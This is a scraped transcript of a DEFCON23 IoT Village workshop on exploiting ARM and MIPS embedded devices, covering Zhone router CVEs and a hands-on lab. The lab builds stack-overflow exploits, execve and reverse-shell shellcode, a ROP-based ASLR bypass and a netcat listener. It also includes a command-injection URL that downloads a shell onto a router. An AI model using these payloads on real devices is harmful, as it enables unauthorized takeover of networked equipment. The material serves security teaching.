Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
9 likes3,543 views
Lyon Yang discusses his journey in IoT and embedded systems exploitation, emphasizing the security flaws commonly found in IoT devices. He details various vulnerabilities, attack surfaces, and exploitation techniques, including stack overflows and command injections, while introducing tools like 'armcoder' for shellcode crafting. The presentation also reviews the importance of secure coding practices and highlights the potential for significant security risks in current IoT implementations.
![30
Running Server with GDB
On Server:
1. cd /home/hacker1/materials/server/practice_lab1/
./httpdserver < Any port you are assigned to>
2. Example:
Enter: ./httpdserver 10000 &
3. Output: [2324] ß Process ID
4. gdb attach <PID>
Example: gdb attach 2324
5. Press continue in gdb:
c](https://image.slidesharecdn.com/defcon23iotvillagelyonyangiotexploitws2015-150809132952-lva1-app6891/85/Practical-IoT-Exploitation-DEFCON23-IoTVillage-Lyon-Yang-31-320.jpg)
![48
Important ARM Instructions
SVC 1
Service Call –
syscall() is a small library function that invokes the system
call whose assembly language interface has the specified
number with the specified arguments.
LDR r5, [pc, #4]
Load value from Address Location (Register R3 with offset #4)
into R5
STR r4, [pc, #4]
Take value from register R4 and store it at Address Location
(Register R3 with offset #4)](https://image.slidesharecdn.com/defcon23iotvillagelyonyangiotexploitws2015-150809132952-lva1-app6891/85/Practical-IoT-Exploitation-DEFCON23-IoTVillage-Lyon-Yang-49-320.jpg)
![51
execve
int execve(const char *filename, char *const argv[], char
*const envp[]);
r0 => //bin/shn
r1 => //bin/shn
r2 => 0
r7 => 11 (syscall)
r0 => 0](https://image.slidesharecdn.com/defcon23iotvillagelyonyangiotexploitws2015-150809132952-lva1-app6891/85/Practical-IoT-Exploitation-DEFCON23-IoTVillage-Lyon-Yang-52-320.jpg)
![52
Sample execve shellcode
_start:
.code 32
add r3, pc, #1
bx r3 ç Switch to "Thumb Mode (16-bit)”
.code 16
mov r0, pc ß (We place the address of pc in r0)
add r0, #10 ß Add 10 to r0 (point to //bin/sh)
str r0, [sp, #4] ß Place it on the stack
add r1, sp, #4 ß Copy location of /bin/sh to r1
sub r2, r2, r2 ß “Set r2 to 0” (Null byte free instructions)
mov r7, 11 ß syscall execve in r7
svc 1 ß Execute syscall
.ascii "//bin/sh0”](https://image.slidesharecdn.com/defcon23iotvillagelyonyangiotexploitws2015-150809132952-lva1-app6891/85/Practical-IoT-Exploitation-DEFCON23-IoTVillage-Lyon-Yang-53-320.jpg)
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
- 1. 0 Practical IoT Exploitation (ARM & MIPS) Lyon Yang / @l0Op3r – Vantage Point Security
- 2. 1 • Hi everyone my name is Lyon Yang • I hack IoT and embedded systems. • I live in sunny Singapore. • Singapore is a smart city with IoT already deployed. • Taxi drivers in SG will become robots. • I work at a company called Vantage Point • Strongest technical team in Singapore/SE Asia. • Large collective of passionate hackers. • Working in the financial and government sectors.
- 3. 2 Today I want to share with you a story: 1 year ago, I set about to try and become the “corelan” of ARM and MIPS exploitation - a formidable task! I wanted to fully understand embedded systems and try to contribute back into the community. and in the process pop many shells!
- 4. 3 Who Am I ? • I am a rather regular guy… • Basic understanding of ASM and exploitation • Attended some training events myself • Corelan, HITB, OSCP • Practice Makes Perfect • I started buying embedded devices and ‘playing’ • Working on IoT till 2-3am most mornings.
- 5. 4 1990s The state of IoT and embedded security. • Equally as immature as the tools. • “1990 called”- Send our bugs back • Basic strcpy/memcpy exploits • Not much privilege separation • Unsecured host OS • Backdoors are often ‘vendor features’ • Not all vendors care about security
- 6. 5 Attack Surface Attack Surface of IoT • Think of IoT devices as miniature computers • ARM or MIPS CPU • “Hard-Drive” is a memory IC • Runs Linux (typically) • Communicate over WiFi/Wired • HTTPD, UnPnP, FTPD, SSHD, TelnetD
- 7. 6 At Vantage Point I work with IoT vendors within SE Asia • Network Services (httpd/telnetd…) • Found more stack overflows than you can count • “Every string was insecurely handled” • Admin “restricted” Shells command1 | sh sh dumpmem/readmem
- 8. 7 Bugs • Backdoor User(s) • Security Implemented in Client Side • Debug interfaces left active • File Upload -> Shell • Arbitrary File Read (../../../../) • Command Injection • Stack Overflows • Unauthorized Remote Access via UPnP
- 9. 8 Developers typically modify open source software • Customized to meet their own needs. • MicroHTTPD, BusyBox. • This requires you are a strong C, C++ Developer • Most developers now-a-days, are not so strong. • Customizations exactly where we find bugs. • Stack Overflows in vendor modifications • Additional File Handlers or HTTP Methods • Authentication • Password Reset • Log File Access
- 10. 9 ZHONE Zhone Technologies is a Global Leader in Fiber Access Transformation for Service Provider and Enterprise Networks! • Based in the US Reference from zhone.com
- 11. 10 Telcos using Zhone Routers Reference from Shodan
- 12. 11 Privilege Escalation CVE-2014-8356 Privilege Escalation via Javascript Controls • Access Control via Javascript! (Horrible!) • Direct Object Reference to administrative functions!
- 13. 12 Plaintext Passwords All username and passwords usually found in the backup settings file! CVE-2014-8537– Exposed Plaintext Username & Passwords • Passwords found to be BASE64 encoded in backup settings file. GET /backupsettings.conf? action=getConfig&sessionKey=
- 14. 13 Command Injection (Telnetd) CVE-‐2014-‐9118 Command Injec;on via the telnetd session # download-‐sw “Dp://123:213@213/;ls -‐la”
- 15. 14 Command Injection (HTTPD) Favourite way to look for Command Injection via IDA Pro: Search for keyword “shell” in IDA PRO: Sample Exploit: /zhnping.cmd? &test=traceroute&sessionKey=985703201&ipA ddr=192.168.1.1|wget%20h5p:// 192.168.1.17/shell%20-‐O%20/tmp/ shell&Wl=30&wait=3&queries=3
- 16. 15 x41x41x41x41 GET /.htmlAAAAA…(7000 ‘A’)…AAAA.html POST /.tst HTTP/1.1 Host: 192.168.1.1 AAAA…..AAAA (7000 Characters)
- 17. 16 Stack Executable Stack commonly found to be executable
- 18. 17 • ASLR • Bad Characters • Auto-Killing Process Monitoring • Cache Incoherency Common Exploit Writing Issues
- 20. 19 Cache Incoherency • Self-modifying code (Encoder/Decoder) would commonly cause Cache Incoherency • Instructions stored in Instruction Cache will execute instead of Data Cache • Modified Shellcode is stored in Data Cache and will not execute Reference: hWp://community.arm.com/groups/processors/blog/2010/02/17/caches-‐and-‐self-‐modifying-‐code
- 21. 20 Overcome Cache Incoherency • Flush the cache. • Encode and decode only the data portion of the shellcode. Data is not considered as Instructions!
- 22. 21 Decoding Data Decoder Shellcode (Instruc;ons) Shellcode (Encoded Data) Decode Read Data Shellcode (Decoded Data) Instruc;on Cache Data Cache
- 23. 22 MIPS Exploit Writing Clear Cache à Use ROP Gadget to clear cache ASLR à Use ROP Gadget to jump to Stack Bad Characters à Wrote your own encoder Auto-Respawn Process Monitoring à Fork the Shellcode Process
- 25. 24 ARMEncoder ARMCoder (Alpha Stage) Ultimate tool to crafting your shellcode • Mthumb encoder (Encodes all or part of your ARM Shellcodes) • Provides you with an encoder • Objdump your shellcode binary to specific formats like C: "x41x42x43x44” Upcoming features • Detects for bad characters • 32bit encoder • Generates Shellcode • Accept other forms of shellcode input. (Currently only supports reading from binary) • Added support for MIPS Architecture Download Link: https://github.com/l0Op3r/ARMCoder
- 26. 25 ARM Exploitation Workshop • Triggering stack overflows to ARM shell. • Learn ASLR bypass with ROP the ARM way • Learn briefly how to read shellcode for the ARM architecture • Get your shiny Hash Prompt!
- 27. 26 Required Setup Requires: Kali with Python SSID: random2 Password: iotvillage! (small caps) Credentials on the piece of paper. ssh <userid>@192.168.1.<ip>
- 28. 27 Setup Step 1: Download materials on your client wget http://192.168.1.1:8000/materials.tar wget http://192.168.1.1:8000/lyonslides.pdf Step 2: Extract materials tar –xvf materials.tar Use any of the assigned ports to listen on from the server. Port <As Assigned>
- 29. 28 What are we hacking? Buffer overflow in two applications: • Simple Bufferoverflow without ASLR ~/materials/server/practicelab1/httpdserver • Bufferoverflow with ASLR Hint use ROP Gadgets from binary “server” ~/materials/server/practicelab2/server
- 30. 29 StackOverflow x41x41x41x41 What is a Stack Overflow? Program tries to use more memory space than the call stack has available. Register PC (Program Counter) Register SP (Stack Pointer) AAAAAA AAAAAA AAAAAA AAAAn Saved $PC Strcpy() writes this way
- 31. 30 Running Server with GDB On Server: 1. cd /home/hacker1/materials/server/practice_lab1/ ./httpdserver < Any port you are assigned to> 2. Example: Enter: ./httpdserver 10000 & 3. Output: [2324] ß Process ID 4. gdb attach <PID> Example: gdb attach 2324 5. Press continue in gdb: c
- 32. 31
- 33. 32 Running Exploit Python script sends 950 ‘A’s to server On Client (Kali Linux): 1. cd materials/client/ 2. python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on> Example: python arm_practice_lab_0.py 192.168.1.4 10000
- 35. 34 We have control over PC Server: Type “info registers” or “i r” in gdb
- 36. 35 Server Server: Re-run httpdserver and attach with gdb Example: ./httpdserver <port no> & gdb attach <pid>
- 37. 36 Register r15/PC What is the program counter (PC) used for? Address (Location) of next instruction to be executed. As each instruction gets fetched the program counter increases its value by 2 or 4 Register PC (Program Counter) Register SP (Stack Pointer) AAAAAA AAAAAA AAAAAA AAAAn AAAA Strcpy() writes this way Calculate Offset to $PC
- 38. 37 OFFSETS How do we locate the offset to PC? Client: • /usr/share/metasploit-framework/tools/ pattern_create.rb 950
- 39. 38 OFFSETS Client: In the python script “arm_practice_lab_0.py” modify “buffer”: Copy and paste the pattern generated by pattern_create.rb Example: buffer = “aAbB-----yYzZ” Run edited python script: python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on> Answer in: materials/client/answers/arm_practice_lab_1.py
- 40. 39 Server: 1. Type “info registers” or “i r” in gdb 2. Copy address in Program Counter Register (PC) Example:0x72413970 Getting the pattern offset
- 41. 40 Locating offset to PC Client: 1. Enter the following command: /usr/share/metasploit-framework/tools/pattern_offset.rb <Copied Address> 2. Modify python script to confirm the offset is correct: buffer= 'A'*508 buffer+= 'B'*4 buffer+= ‘C’ * (950 – len(buffer)) Answer in: materials/client/answers/arm_pracNce_lab_2.py 3. Run edited python script (On the server remember to Re-‐run h5pdserver and aWach with gdb): python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on>
- 42. 41 Where to put our shellcode? Server: 1. Confirm that register PC has been overwritten by ‘x42x42x42x42’ by typing the following in gdb : “i r” 2. Find out where the stack pointer is pointing to? By typing the following in gdb: “x/8a $sp-4” 3. Copy the address stored at register $sp address. Example: 0x7efff680
- 43. 42 Where is $SP pointing to?
- 44. 43 Add stack location to the script Client: 1. Modify python script to confirm that the PC has jumped to the right location: buffer='A'*508 buffer+='x80xf6xffx7e' buffer += 'C' * (950-len(buffer)) ßShellcode Answer in: materials/client/answers/ arm_practice_lab_3.py
- 45. 44 Shellcoding Why learn shellcoding? Lots of shellcodes to be used for free online! In Exploit Development, there will be a lot of hoops and obstacles to jump through: - Modification to shellcode - Bad Characters
- 46. 45 Bad Characters! Common Bad Characters: “x00x20x0a” Functions like strcpy() terminate after null byte! Common solution: Encode the shellcode!
- 47. 46 ARM Registers
- 48. 47 Important ARM Instructions MOV r1, #1 Moving #1 to register r1 ADD r1, r2, #3 Adding #3 to Register R2 and moving it to R1 SUB r1, r2, #3 Subtracting #3 from R2 and moving it to R1
- 49. 48 Important ARM Instructions SVC 1 Service Call – syscall() is a small library function that invokes the system call whose assembly language interface has the specified number with the specified arguments. LDR r5, [pc, #4] Load value from Address Location (Register R3 with offset #4) into R5 STR r4, [pc, #4] Take value from register R4 and store it at Address Location (Register R3 with offset #4)
- 50. 49 Important ARM Instructions Branch (B, BL, BX, BLX, and BXJ) instructions Branch like Jump Instructions (JMP) in x86 Example: B R3 http://infocenter.arm.com/help/index.jsp?topic=/ com.arm.doc.dui0204j/Cihfddaf.html
- 51. 50 SYSCALL Where to find the syscall offset to use? # cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep execve #define __NR_execve (__NR_SYSCALL_BASE+ 11) Register r7 is used to store the location of the syscall to execute
- 52. 51 execve int execve(const char *filename, char *const argv[], char *const envp[]); r0 => //bin/shn r1 => //bin/shn r2 => 0 r7 => 11 (syscall) r0 => 0
- 53. 52 Sample execve shellcode _start: .code 32 add r3, pc, #1 bx r3 ç Switch to "Thumb Mode (16-bit)” .code 16 mov r0, pc ß (We place the address of pc in r0) add r0, #10 ß Add 10 to r0 (point to //bin/sh) str r0, [sp, #4] ß Place it on the stack add r1, sp, #4 ß Copy location of /bin/sh to r1 sub r2, r2, r2 ß “Set r2 to 0” (Null byte free instructions) mov r7, 11 ß syscall execve in r7 svc 1 ß Execute syscall .ascii "//bin/sh0”
- 54. 53 Wait for Shell Client: Listen on port 31337: nc –lvp 31337
- 55. 54 Server: 1. Change to shellcode directory: cd ~/materials/shellcode/ 2. Edit forkshellcode.s to your client IP Address: .short 0x697a .byte 192,168,1,3 ßYour own IP Address .ascii "//bin//sh00" 3. Compile the shellcode: #as –mthumb –o fork_shellcode.o fork_shellcode.s #ld –o fork_shellcode fork_shellcode.o 4. Execute the shellcode: ./fork_shellcode
- 56. 55 A shell should return on your netcat listener
- 57. 56 Fork()
- 58. 57 Fork Shellcode Why Fork()? • More stable exploit as shellcode process is spawned as a new process • A process that monitors critical services for failure and respawns/kills process. (Commonly found in embedded devices)
- 59. 58 Pop Shell Exploiting the binary and getting our first shell! Python ARMCoder.py –scb <binary> -be
- 60. 59 Server: 1. Dump forkshellcode binary in python format: • cd ~/materials/client • python ARMCoder.py –be –scb ~/materials/ shellcode/fork_shellcode
- 61. 60 ` Client: 1. Copy output and paste into python script. Replace ‘C’ with shellcode: (May want to edit: materials/client/answers/arm_practice_lab_4.py) buffer+='x80xf6xffx7e’ buffer+=("xe2x8fx10x01” "xe1x2fxffx11” … "x00x68x00x00") 2. Listen on port 31337: nc –lvp 31337 3. Run edited python script: (Remember to Re-run httpdserver and attach with gdb on the server): python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on> 4. Check for shell on netcat listener
- 62. 61 Reverse Shell A shell should return on your netcat listener
- 63. 62 Common Problem What is ASLR? Address space layout randomization (ASLR) is a computer security technique involved in protection from buffer overflow attacks. Addresses of Stack and Libraries most of the time randomized!
- 64. 63 ROPGadgets Return-Oriented Programming (ROP): Attacker uses control of the call stack to indirectly execute machine instructions In simple terms, finding and executing machine instructions found in the httpd binary or libraries.
- 65. 64 Locating the Right ROPGadget 1. Look for a pivot(ROP GADGET) to jump to stack Hint: 2. Set and hit Breakpoint in the vulnerable server In GDB: b *0x<address> Tools to use: Johnathan Salwan Tool: ROPGadget.py OBJDUMP–d <binary>
- 66. 65 ROPGadget Server: 1. Change to server directory: cd ~/materials/server/practice_lab2 2. objdump –d server | grep –B 2 bx
- 67. 66 ROPGadget Server: 3. Copy ROP Gadget loca;on 8714: e28d600c add r6, sp, #12 8718: e12fff16 bx r6 4. Run materials/server/pracNcelab2/server <Assigned Port> and aWach to gdb 3. In gdb set breakpoint at 0x8714 and con;nue: b *0x8714 c
- 68. 67 ROPGadget Client: 1. Offset has been calculated and located at 520. Modify python script “python arm_practice_lab2_0.py” and add ROP gadget to replace PC: buffer = 'A'*520 buffer += 'x14x87’ Answer: materials/client/answers2/ arm_practice_lab2_1.py 2. Run edited python script: python arm_practice_lab2_1.py <Assigned Server IP> <Port you run server on>
- 69. 68 Breakpoint Server: 1. Verify that breakpoint 0x8714 hits in the gdb session. 2. Step through code and copy where did the ROP Gadget jump to: • stepi • stepi • x/8a $pc-4
- 70. 69 Breakpoint
- 71. 70 Bad Characters! Common Bad Characters: “x00x20x0a” Functions like strcpy() terminate after null byte! So what do we normally do? Encode the shellcode!
- 72. 71 How to use the ARMCoder python ARMCoder.py -scb <Binary> -spos <starting offset to encode> -epos <Ending offset to encode> -be (Endianess)
- 74. 73 ARMCoder Example Ending Pos;on: 80be+2 – 8054 = 6C (Hexadecimal), 108 (Decimal) Star;ng Pos;on: 80a8 – 8054 = 54 (Hexadecimal), 84 (decimal)
- 75. 74 ARMCoder Server: 1. Change directory to ~/materials/client: cd ~/materials/client 2. Encode and dump the fork_shellcode using ARMCoder.py: python ARMCoder.py -scb ../shellcode/ fork_shellcode -be -spos 84 -epos 108
- 76. 75 ARMCoder
- 77. 76 Modifying the Client Exploit Client: Modify python script to include the output from ARMCoder.py: 1. Add a NOP for an alignment issue with PC: nop_mthumb = 'xc0x46’ 2. Copy the code mthumb code from ARMCoder: mthumbmode = "x01x10x8fxe2x11xffx2fxe1” 3. Copy decoder code from ARMCoder: decoder = "x49xf6x99x14xc9xf6x99x14x4cx21x5a x23x7dx46xeex58x66x40xee x50xc0x46x04x33x08x39x24x29xf7xda”
- 79. 78 Client Client: Edit the following python script: materials/client/answers2/arm_practice_lab2_1.py Note: Do not copy mthumb code (first two lines of shellcode output by ARMCoder.py). Remove from shellcode: "x01x10x8fxe2”"x11xffx2fxe1" mthumb code already added the mthumb code in the initial stage. 1. Copy shellcode output from ARMCoder into python script: shellcode = ("x01x24xb6x1b” … "xf1x99x99x99")
- 81. 80 Server Server: Re-run server and attach with gdb Example: ./server <port no> & gdb attach <pid>
- 82. 81 Modifying the Client Exploit Client: 1. Add all required variables to the buffer in the python script: buffer = mthumbmode + nop_mthumb + decoder +shellcode buffer += 'A'*(520-len(buffer)) buffer += 'x14x87’ s.send(buffer) 2. Listen on port 31337: nc –lvp 31337 3. Run edited python script: python arm_practice_lab2_2.py <Assigned Server IP> <Port you run server on>
- 83. 82 Final Exploit
- 84. 83 NOPS Why Add a NOP?
- 85. 84 Register PC Alignment Problem Why add a NOP?! Ran through debugger, Shellcode decoded correctly but shell does not return! Program Counter often adjusts its offsets automatically
- 87. 86 Awesome References! • Craig Heffner http://www.devttys0.com/ • Johnathan Salwan http://shell-storm.org/
- 88. 87 Special Thanks Bernhard Mueller Paul Craig Stefan Streichsbier Roberto Suggi Liverani Han Lee Ryan Baxendale